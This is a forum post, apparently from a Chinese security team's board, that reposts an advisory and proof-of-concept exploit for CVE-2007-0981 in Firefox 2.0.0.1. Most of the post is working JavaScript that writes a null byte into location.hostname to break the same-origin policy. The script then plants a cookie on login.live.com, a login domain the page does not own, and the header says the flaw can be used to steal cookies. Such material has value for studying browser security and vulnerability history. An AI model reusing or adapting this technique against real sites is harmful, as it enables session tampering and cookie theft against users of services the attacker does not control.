‹‹ 上一主题 | 下一主题 ››
发新话题
打印

Mozilla Firefox <= 2.0.0.1 (location.hostname) Cross-Domain Vulnerabili

pub!1c

团队执行官

Rank: 8Rank: 8

E.S.T核心成员

帖子
3925 
精华
128 
积分
209875 
阅读权限
200 
性别
男 
在线时间
1106 小时 
注册时间
2007-10-23 
最后登录
2008-8-20 

资料收集奖 运营支持奖

楼主 发表于 2007-2-23 19:25  只看该作者

Mozilla Firefox <= 2.0.0.1 (location.hostname) Cross-Domain Vulnerabili

复制内容到剪贴板
代码:
<!--
________________________________________________________________________________
  
Mozilla Firefox &#39;location.hostname&#39; Cross-Domain Vulnerability
________________________________________________________________________________

Software    : Mozilla Firefox version 2.0.0.1 and prior
CVE reference : CVE-2007-0981
Impact      : Security Bypass
Risk       : Moderate
Discovered by : Michal Zalewski (http://lcamtuf.coredump.cx/)
Advisory Date  : 2007-02-15

Mozilla Firefox allows remote attackers to bypass the same origin policy, steal
cookies, and conduct other attacks by writing a URI with a null byte to the
hostname (location.hostname) DOM property, due to interactions with DNS
resolver code.

Links
http://lcamtuf.dione.cc/ffhostname.html (test)
https://bugzilla.mozilla.org/show_bug.cgi?id=370445
________________________________________________________________________________

How To Test Your Browser ?
1 - Execute this on your local web server (or change variable &#39;mydomain&#39;)
2 - Go to the link &#39;http://login.live.com/&#39; and read the login
   (or check Tools -> Options -> Privacy -> Show Cookies for login.live.com)
________________________________________________________________________________

Gorn, gorn.support[gmail]com
2007-02-19 16:00

-->

<script language="javascript">
var mydomain = &#39;127.0.0.1&#39;;
var var_cook = &#39;MSPPre=firefox_vulnerability_test&#39;;
var dom_cook = &#39;login.live.com&#39;;

if (location.hostname == mydomain)
{
  try { location.hostname = mydomain + &#39;\x00www.&#39; + dom_cook; }
  catch (err) { alert(&#39;Failed to modify location.hostname&#39;); }
} else {
  document.cookie = var_cook + &#39;; domain=.&#39; + dom_cook + &#39;; path=/;&#39;;  
}
</script>

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题